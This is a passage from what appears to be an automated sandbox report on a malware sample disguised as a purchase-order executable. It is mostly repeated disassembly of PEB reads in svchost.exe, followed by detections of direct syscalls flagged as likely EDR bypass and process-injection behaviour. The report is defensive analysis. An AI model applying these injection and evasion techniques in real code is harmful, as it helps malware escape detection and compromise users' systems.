                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E53E mov eax, dword ptr fs:[00000030h]1_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C6500 mov eax, dword ptr fs:[00000030h]1_2_036C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]1_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]1_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]1_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]1_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]1_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]1_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]1_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036325E0 mov eax, dword ptr fs:[00000030h]1_2_036325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366C5ED mov eax, dword ptr fs:[00000030h]1_2_0366C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366C5ED mov eax, dword ptr fs:[00000030h]1_2_0366C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E5CF mov eax, dword ptr fs:[00000030h]1_2_0366E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E5CF mov eax, dword ptr fs:[00000030h]1_2_0366E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036365D0 mov eax, dword ptr fs:[00000030h]1_2_036365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A5D0 mov eax, dword ptr fs:[00000030h]1_2_0366A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A5D0 mov eax, dword ptr fs:[00000030h]1_2_0366A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B05A7 mov eax, dword ptr fs:[00000030h]1_2_036B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B05A7 mov eax, dword ptr fs:[00000030h]1_2_036B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B05A7 mov eax, dword ptr fs:[00000030h]1_2_036B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036545B1 mov eax, dword ptr fs:[00000030h]1_2_036545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036545B1 mov eax, dword ptr fs:[00000030h]1_2_036545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03632582 mov eax, dword ptr fs:[00000030h]1_2_03632582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03632582 mov ecx, dword ptr fs:[00000030h]1_2_03632582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03664588 mov eax, dword ptr fs:[00000030h]1_2_03664588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E59C mov eax, dword ptr fs:[00000030h]1_2_0366E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BC460 mov ecx, dword ptr fs:[00000030h]1_2_036BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365A470 mov eax, dword ptr fs:[00000030h]1_2_0365A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365A470 mov eax, dword ptr fs:[00000030h]1_2_0365A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365A470 mov eax, dword ptr fs:[00000030h]1_2_0365A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EA456 mov eax, dword ptr fs:[00000030h]1_2_036EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362645D mov eax, dword ptr fs:[00000030h]1_2_0362645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365245A mov eax, dword ptr fs:[00000030h]1_2_0365245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362E420 mov eax, dword ptr fs:[00000030h]1_2_0362E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362E420 mov eax, dword ptr fs:[00000030h]1_2_0362E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362E420 mov eax, dword ptr fs:[00000030h]1_2_0362E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362C427 mov eax, dword ptr fs:[00000030h]1_2_0362C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]1_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]1_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]1_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]1_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]1_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]1_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]1_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03668402 mov eax, dword ptr fs:[00000030h]1_2_03668402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03668402 mov eax, dword ptr fs:[00000030h]1_2_03668402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03668402 mov eax, dword ptr fs:[00000030h]1_2_03668402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036304E5 mov ecx, dword ptr fs:[00000030h]1_2_036304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036364AB mov eax, dword ptr fs:[00000030h]1_2_036364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036644B0 mov ecx, dword ptr fs:[00000030h]1_2_036644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BA4B0 mov eax, dword ptr fs:[00000030h]1_2_036BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EA49A mov eax, dword ptr fs:[00000030h]1_2_036EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362CB7E mov eax, dword ptr fs:[00000030h]1_2_0362CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E4B4B mov eax, dword ptr fs:[00000030h]1_2_036E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E4B4B mov eax, dword ptr fs:[00000030h]1_2_036E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03702B57 mov eax, dword ptr fs:[00000030h]1_2_03702B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03702B57 mov eax, dword ptr fs:[00000030h]1_2_03702B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03702B57 mov eax, dword ptr fs:[00000030h]1_2_03702B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03702B57 mov eax, dword ptr fs:[00000030h]1_2_03702B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C6B40 mov eax, dword ptr fs:[00000030h]1_2_036C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C6B40 mov eax, dword ptr fs:[00000030h]1_2_036C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FAB40 mov eax, dword ptr fs:[00000030h]1_2_036FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D8B42 mov eax, dword ptr fs:[00000030h]1_2_036D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03628B50 mov eax, dword ptr fs:[00000030h]1_2_03628B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DEB50 mov eax, dword ptr fs:[00000030h]1_2_036DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365EB20 mov eax, dword ptr fs:[00000030h]1_2_0365EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365EB20 mov eax, dword ptr fs:[00000030h]1_2_0365EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F8B28 mov eax, dword ptr fs:[00000030h]1_2_036F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F8B28 mov eax, dword ptr fs:[00000030h]1_2_036F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704B00 mov eax, dword ptr fs:[00000030h]1_2_03704B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638BF0 mov eax, dword ptr fs:[00000030h]1_2_03638BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638BF0 mov eax, dword ptr fs:[00000030h]1_2_03638BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638BF0 mov eax, dword ptr fs:[00000030h]1_2_03638BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365EBFC mov eax, dword ptr fs:[00000030h]1_2_0365EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BCBF0 mov eax, dword ptr fs:[00000030h]1_2_036BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03650BCB mov eax, dword ptr fs:[00000030h]1_2_03650BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03650BCB mov eax, dword ptr fs:[00000030h]1_2_03650BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03650BCB mov eax, dword ptr fs:[00000030h]1_2_03650BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03630BCD mov eax, dword ptr fs:[00000030h]1_2_03630BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03630BCD mov eax, dword ptr fs:[00000030h]1_2_03630BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03630BCD mov eax, dword ptr fs:[00000030h]1_2_03630BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DEBD0 mov eax, dword ptr fs:[00000030h]1_2_036DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640BBE mov eax, dword ptr fs:[00000030h]1_2_03640BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640BBE mov eax, dword ptr fs:[00000030h]1_2_03640BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E4BB0 mov eax, dword ptr fs:[00000030h]1_2_036E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E4BB0 mov eax, dword ptr fs:[00000030h]1_2_036E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366CA6F mov eax, dword ptr fs:[00000030h]1_2_0366CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366CA6F mov eax, dword ptr fs:[00000030h]1_2_0366CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366CA6F mov eax, dword ptr fs:[00000030h]1_2_0366CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DEA60 mov eax, dword ptr fs:[00000030h]1_2_036DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036ACA72 mov eax, dword ptr fs:[00000030h]1_2_036ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036ACA72 mov eax, dword ptr fs:[00000030h]1_2_036ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]1_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]1_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]1_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]1_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]1_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]1_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]1_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640A5B mov eax, dword ptr fs:[00000030h]1_2_03640A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640A5B mov eax, dword ptr fs:[00000030h]1_2_03640A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366CA24 mov eax, dword ptr fs:[00000030h]1_2_0366CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365EA2E mov eax, dword ptr fs:[00000030h]1_2_0365EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03654A35 mov eax, dword ptr fs:[00000030h]1_2_03654A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03654A35 mov eax, dword ptr fs:[00000030h]1_2_03654A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BCA11 mov eax, dword ptr fs:[00000030h]1_2_036BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366AAEE mov eax, dword ptr fs:[00000030h]1_2_0366AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366AAEE mov eax, dword ptr fs:[00000030h]1_2_0366AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03686ACC mov eax, dword ptr fs:[00000030h]1_2_03686ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03686ACC mov eax, dword ptr fs:[00000030h]1_2_03686ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03686ACC mov eax, dword ptr fs:[00000030h]1_2_03686ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03630AD0 mov eax, dword ptr fs:[00000030h]1_2_03630AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03664AD0 mov eax, dword ptr fs:[00000030h]1_2_03664AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03664AD0 mov eax, dword ptr fs:[00000030h]1_2_03664AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638AA0 mov eax, dword ptr fs:[00000030h]1_2_03638AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638AA0 mov eax, dword ptr fs:[00000030h]1_2_03638AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03686AA4 mov eax, dword ptr fs:[00000030h]1_2_03686AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704A80 mov eax, dword ptr fs:[00000030h]1_2_03704A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03668A90 mov edx, dword ptr fs:[00000030h]1_2_03668A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03656962 mov eax, dword ptr fs:[00000030h]1_2_03656962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03656962 mov eax, dword ptr fs:[00000030h]1_2_03656962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03656962 mov eax, dword ptr fs:[00000030h]1_2_03656962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0367096E mov eax, dword ptr fs:[00000030h]1_2_0367096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0367096E mov edx, dword ptr fs:[00000030h]1_2_0367096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0367096E mov eax, dword ptr fs:[00000030h]1_2_0367096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D4978 mov eax, dword ptr fs:[00000030h]1_2_036D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D4978 mov eax, dword ptr fs:[00000030h]1_2_036D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BC97C mov eax, dword ptr fs:[00000030h]1_2_036BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B0946 mov eax, dword ptr fs:[00000030h]1_2_036B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704940 mov eax, dword ptr fs:[00000030h]1_2_03704940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B892A mov eax, dword ptr fs:[00000030h]1_2_036B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C892B mov eax, dword ptr fs:[00000030h]1_2_036C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE908 mov eax, dword ptr fs:[00000030h]1_2_036AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE908 mov eax, dword ptr fs:[00000030h]1_2_036AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BC912 mov eax, dword ptr fs:[00000030h]1_2_036BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03628918 mov eax, dword ptr fs:[00000030h]1_2_03628918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03628918 mov eax, dword ptr fs:[00000030h]1_2_03628918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BE9E0 mov eax, dword ptr fs:[00000030h]1_2_036BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036629F9 mov eax, dword ptr fs:[00000030h]1_2_036629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036629F9 mov eax, dword ptr fs:[00000030h]1_2_036629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C69C0 mov eax, dword ptr fs:[00000030h]1_2_036C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]1_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]1_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]1_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]1_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]1_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]1_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036649D0 mov eax, dword ptr fs:[00000030h]1_2_036649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FA9D3 mov eax, dword ptr fs:[00000030h]1_2_036FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036309AD mov eax, dword ptr fs:[00000030h]1_2_036309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036309AD mov eax, dword ptr fs:[00000030h]1_2_036309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B89B3 mov esi, dword ptr fs:[00000030h]1_2_036B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B89B3 mov eax, dword ptr fs:[00000030h]1_2_036B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B89B3 mov eax, dword ptr fs:[00000030h]1_2_036B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BE872 mov eax, dword ptr fs:[00000030h]1_2_036BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BE872 mov eax, dword ptr fs:[00000030h]1_2_036BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C6870 mov eax, dword ptr fs:[00000030h]1_2_036C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C6870 mov eax, dword ptr fs:[00000030h]1_2_036C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03642840 mov ecx, dword ptr fs:[00000030h]1_2_03642840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03660854 mov eax, dword ptr fs:[00000030h]1_2_03660854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634859 mov eax, dword ptr fs:[00000030h]1_2_03634859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634859 mov eax, dword ptr fs:[00000030h]1_2_03634859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03652835 mov eax, dword ptr fs:[00000030h]1_2_03652835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03652835 mov eax, dword ptr fs:[00000030h]1_2_03652835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03652835 mov eax, dword ptr fs:[00000030h]1_2_03652835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03652835 mov ecx, dword ptr fs:[00000030h]1_2_03652835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03652835 mov eax, dword ptr fs:[00000030h]1_2_03652835
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C680A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_00C680A9
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C3A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C3A155
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C3A124 SetUnhandledExceptionFilter,0_2_00C3A124

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exeNtClose: Direct from: 0x76F02B6C
